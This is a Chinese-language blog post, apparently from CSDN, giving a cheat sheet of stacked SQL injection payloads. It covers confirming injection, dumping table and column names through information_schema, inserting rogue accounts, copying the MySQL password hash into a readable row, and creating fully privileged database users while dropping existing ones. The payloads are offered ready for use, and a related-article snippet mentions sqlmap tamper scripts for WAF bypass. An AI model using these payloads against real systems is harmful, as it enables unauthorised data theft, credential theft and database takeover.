sql堆叠注入

最新推荐文章于 2024-07-31 19:38:21 发布
最新推荐文章于 2024-07-31 19:38:21 发布
阅读量25 收藏
点赞数
文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/abv545411/article/details/134234903
版权

使用
id=1' and 1=1--+
id=1' and 1=2--+
先确定是否存在注入。
页面返回不一样就说明存在注入

-999' union select 1,2,(select group_concat(TABLE_NAME) from information_schema.TABLES where TABLE_SCHEMA=database() limit 1)--+      爆表

-999' union select 1,2,(select group_concat(column_name) from information_schema.columns where TABLE_NAME='users' limit 1)--+    爆字段

知道表的列的情况下使用 insert into 插入语句进行增加账号。如果是管理表,直接添加管理员账号即可登录后台。
-999';insert into users(id,username,password)values(1000,'at0','123456')--+
访问 1000 即可访问到刚刚添加的账号。


-999';insert into users(id,username,password)values(1001,(select authentication_string from mysql.user limit 1),'123456')--+        添加用户,将mysql的登陆密码写入用户1001的密码中,在经过查询得到密码


-999';insert into users(id,username,password)values(1002,(select version()),'123456')--+     获取版本信息

创建用户  
1';create user 'qingwu2@'36.237.252.58' identified by '1234567'; %23
给权限
1';GRANT ALL PRIVILEGES ON *.* TO lhz@localhost;%23
删除 
1';drop user lhz@localhost;%23


自己给自己设置一个用户 删除原来的用户 先给设置的用户一个所有的权限  然后再删除   然后再登录试试   

xiaohaisec
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
15-SQL堆叠注入
qq_56414082的博客
03-29 1711
参考资料;sqlmap中存放绕过waf的一些脚本小插件在tamper文件夹中创建rdog.py,在tamper中找个文件打开,复制脚本修改""""""import repass(*/)')(*/)')//--proxy是代理,和bg抓包IP一致可以看到的是代码并没有按照我们预期执行,我们添加代理看看到底是个什么情况可以看到user-agent是,安全软件当中是禁止使用这种脚本客户端所以就被拦截,自然插件脚本也就没办法正常执行解决思路:通过抓包对比分析。
sql-堆叠注入
zhhhb1005的博客
08-14 510
前几星期写题时遇见了好几道关于堆叠注入的题目,结果发现我对堆叠注入不是特别了解,所以写一下博客记录一下,但是发现堆叠注入使用的场景和条件好像有点苛刻。
sql注入堆叠注入
weixin_42566218的博客
02-19 8684
一、堆叠注入的原理 mysql数据库sql语句的默认结束符是以";"号结尾,在执行多条sql语句时就要使用结束符隔 开,而堆叠注入其实就是通过结束符来执行多条sql语句 比如我们在mysql的命令行界面执行一条查询语句,这时语句的结尾必须加上分号结束 select * from student; 如果我们想要执行多条sql那就用结束符分号进行隔开,比如在查询的同时查看当前登录用户是谁 select * from student;select current_user();
SQL堆叠注入详解
永远是少年
08-07 705
今天继续给大家介绍Linux运维相关知识,本文主要内容是SQL堆叠注入。 一、SQL 堆叠注入简介 二、SQL堆叠注入实战
SQL注入原理-堆叠注入
zl5186888的博客
09-21 610
mysqli_query()只能执行一条SQL语句,如果这需要执行多条SQL语句,就需要使用mysqli_multi_query()方法,mysqli_multi_query()可以执行多条SQL语句,如果后端代码使用这个方法去执行SQL语句,我们就可以利用堆叠注入获取后台数据库的信息。这样我们就得到了当前数据库长度,接下来可以爆出数据库的库名以及接下来的获取数据的各种操作,具体的时间盲注操作可以参考我之前的文章——SQL注入原理之时间盲注,原理都一样,小伙伴理解之后套用就行了。
SQL注入——堆叠注入
nobugnomoney的博客
05-19 3195
一、堆叠注入的原理 1、介绍 在 SQL 中,分号(;)是用来表示一条 sql 语句的结束。试想一下我们在 ; 结束一个 sql 语句后继续构造下一条语句,会不会一起执行?因此这个想法也就造就了堆叠注入。而 union injection(联合注入)也是将两条语句合并在一起,两者之间有什么区别么?区别就在于 union 或者 union all 执行的语句类型是有限的,可以用来执行查询语句,而堆叠注入可以执行的是 任意的语句。 例如下面这个例子: 用户输入: 1; DELETE FROM products
SQL注入-堆叠注入
m0_53820621的博客
08-15 1397
数据库支持堆叠查询,所谓堆叠查询就是执行多条语句,语句以;隔开。并且代码使用了支持堆叠查询的函数,列如PHP的。堆叠注入就是在第二条语句中构造payload,注:页面只返回第一条语句,不返回第二条语句。堆叠注入后果很严重,可以直接对数据库增删改。...
sql注入知识---堆叠注入
尘玥的故事
04-11 1305
堆叠注入的使用条件十分有限,其可能受到API或者数据库引擎,又或者权限的限制只有当调用数据库函数支持执行多条sql语句时才能够使用,利用mysqli_multi_query()函数就支持多条sql语句同时执行,但实际情况中,如PHP为了防止sql注入机制,往往使用调用数据库的函数是mysqli_ query()函数,其只能执行一条语句,分号后面的内容将不会被执行,所以可以说堆叠注入的使用条件十分有限,一旦能够被使用,将可能对网站造成十分大的威胁。根据数据库类型决定是否支持多条语句执行(核心)
记录一次easy_sql堆叠注入
Aiwin的博客
05-25 224
easy_sql堆叠注入
SQL注入堆叠注入
07-15 939
SQL-堆叠注入
spring —— 事务管理器
firstgrass的博客
07-25 692
事务管理主要针对数据源进行操作:在数据库方面,通过 TransactionManager 事务管理器进行管理,表明一旦出现错误,该数据源的所有数据全部复原。那么数据库如何判断是否发生了错误呢?这就需要在代码方面,通过 @Transactional 注解管理相应的方法,表示一旦该方法出现错误,那么由该方法调用的数据就要执行回滚。
SQL Server 数据误删的恢复
踏雨歌青春,诗酒趁年华
07-24 9965
在日常的数据库管理中,数据的误删操作是难以避免的。为了确保数据的安全性和完整性,我们必须采取一些措施来进行数据的备份和恢复。本文将详细介绍如何在 SQL Server 中进行数据的备份和恢复操作,特别是在发生数据误删的情况下。假设我们已经开启了全量备份,并且在误操作之前有一个全量备份文件。
简单的 mongoDB 学习
qq_19342829的博客
07-31 350
mongodb入门学习整理
社区养老服务小程序的设计
最新发布
Karen198的博客
07-31 270
管理员账户功能包括:系统首页,个人中心,用户管理,服务人员管理,服务产品管理,服务预约管理,服务状态管理,服务退订管理,活动管理,视频管理。主要技术:Java,Spring,mybatis,mysql,jquery,html。服务器:SpringBoot自带 apache tomcat。微信端账号功能包括:系统首页,服务产品,活动,视频,我的。JDK版本:Java JDK1.8。数据库可视化工具: navicat。数据库版本: mysql5.7。开发工具:IDEA(推荐)开发系统:Windows。
二进制部署k8s集群之master节点和etcd数据库集群(上)
zx52306的博客
07-30 927
【代码】二进制部署k8s集群之master节点和etcd数据库集群(上)
【iOS】——持久化
m0_73974920的博客
07-30 964
因为plist文件不能够保存自定义对象。如果一个字典中保存有自定义对象,如果把这个对象写入到文件当中,它是不会生成 plist文件的。如果对象是NSString、NSDictionary、NSArray、NSData、NSNumber等类型,可以直接用NSKeyedArchiver进行归档和恢复。
已经10岁的K8S,在很多方面仍需努力
u012516914的专栏
07-28 332
/ K8S 已经 10 岁了,但仍然有许多方面要继续努力 /Kubernetes 于 2014 年 6 月推出,自那时起,它在推广云原生应用设计和支持更多微服务部署方面发挥了巨大作用。容器部署的增长非常迅速,而 Kubernetes 对于企业管理这些部署至关重要——根据 CNCF 上一份报告的调查结果,84% 的组织正在使用或评估 Kubernetes,而 66% 的潜在和实际消费者在生产中使用 ...
MySQL-数据操作语言
一直走的很慢的鸭子
07-27 706
DML英文全称是Data Manipulation Language(数据操作语言),用来对数据库中表的数据记录进行增删改操作。
手把手教你安装AoiAWD
swordcloud_xm的博客
07-29 1316
AoiAWD 是一个由Aodzip(安恒信息 海特实验室研究员、HAC战队成员)维护的一个针对于CTF AWD模式的开源项目。专为比赛设计,便携性好,低权限运行的EDR系统。任何人都可以在 GNU AGPL-3.0 许可下使用该项目和分享该项目的源码。AoiAWD地址:https://github.com/DasSecurity-HatLab/AoiAWD。
sqlmap 堆叠注入
08-17
堆叠注入是一种利用数据库查询语句的漏洞进行攻击的技术。SQLMap是一个常用的自动化SQL注入工具,它可以用来检测和利用堆叠注入漏洞。 堆叠注入是通过将多个SQL语句连接在一起执行,从而绕过输入过滤和参数绑定等安全机制。攻击者可以通过构造恶意的输入来执行任意的SQL语句,例如插入、更新或删除数据,甚至执行系统命令。 使用SQLMap可以自动化地检测和利用堆叠注入漏洞。它具有强大的功能,可以自动发现目标网站的注入点,并进行注入测试。你可以通过指定目标URL、注入类型和其他参数来配置SQLMap的运行。 然而,请注意,堆叠注入是一种非常危险的漏洞攻击技术,对于未经授权的测试或攻击是违法的。在进行任何安全测试之前,请确保已经获得了合法的授权,并且仅在合法的测试环境中进行。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值